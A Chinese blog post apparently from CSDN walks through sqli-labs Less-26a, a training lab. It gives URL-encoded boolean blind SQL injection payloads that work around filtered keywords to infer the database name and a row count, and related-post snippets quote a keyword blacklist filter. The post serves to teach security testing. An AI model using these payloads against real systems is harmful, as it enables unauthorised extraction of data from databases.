[网络安全]sqli-labs Less-26a 解题详析

于 2023-10-21 15:54:58 发布
阅读量2k 收藏 3
点赞数 2
分类专栏: # Sqli-Labs靶场攻防实战 文章标签: web安全 数据库 sqlilabs sql
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/133962483
版权

这一关sql语句执行抛出错误后并不在页面输出,所以排除报错注入。

可猜测后端查询语句为SELECT * FROM users WHERE id=('$id') LIMIT0,1

故采用盲注解题

部分payload如下:

判断数据库长度:

?id=2')%26%26length(database())>5%26%26'1'=('1

在这里插入图片描述

求解数据库名第一个字母:

?id=2') %26%26 substr(database(),1,1)>'m' %26%26 '1'=('1

在这里插入图片描述

求解字段的第一个字母:

?id=2') %26%26 (select(count(username)) from (users))>5 %26%26 '1'=('1

在这里插入图片描述

关于盲注的详细原理及题解可参考专栏:SQLiLabs靶场专栏

秋说
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Sqlilabs Less-26
Light_inthe_eyes的博客
03-23 535
判断是单引号字符注入: ?id=1'' 当接下来进行操作时会发现很多被注释掉了,查看源码黑名单过滤了很多:or、and、空格等等: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_r
sqli-labs 26a
weixin_47300936的博客
09-04 659
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
SQLi LABS Less 26a 联合注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第26a关,SQLi-LABS Less-26a,SQLi-LABS Less 26a,SQLiLABS Less26a,SQLi Less 26a
sqli-labs(26a)
weixin_30920853的博客
05-28 702
0x01偷偷看一波源码 和26关一样 闭合变成了’)而已 0X01构造语句爆库名 这是百度到的 第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解%a0,此前在windows+wamp测试,不能解%a0,有知情的请告知。)同时%0b也是可以通过测试的,其他的经测试是不行的。||是或者...
SqliLabs Less26-26a
qq_45785324的博客
07-20 651
SqliLabs Less26 Less26a
sqli-labs:less-26a(过滤了空格和注释,不能报错注入)
羽的博客
09-14 327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,篡改数据库查询,从而获取、修改、删除敏感数据或控制整个数据库系统。常见的防范措施包括: 1. **参数化查询/预编译语句**:使用预编译语句可以...
sqli-labs第二十六二十六a关
m0_73248913的博客
02-21 430
sqli-labs第二十六二十六a关
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
(手工)【sqli-labs26、26a】拼接注入、过滤后注入
07-12 687
【SQL-拼接、过滤后注入】
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1294
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1694
sqlmap脚本跑sqli-labs
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 468
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
sqli-labs/Less-26关
m0_71299382的博客
11-20 1387
sqli-labs第二十六关
sql-labs闯关26~31
qq_44663230的博客
09-03 2342
sql-labs闯关26-28a 29~31暂时不做
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值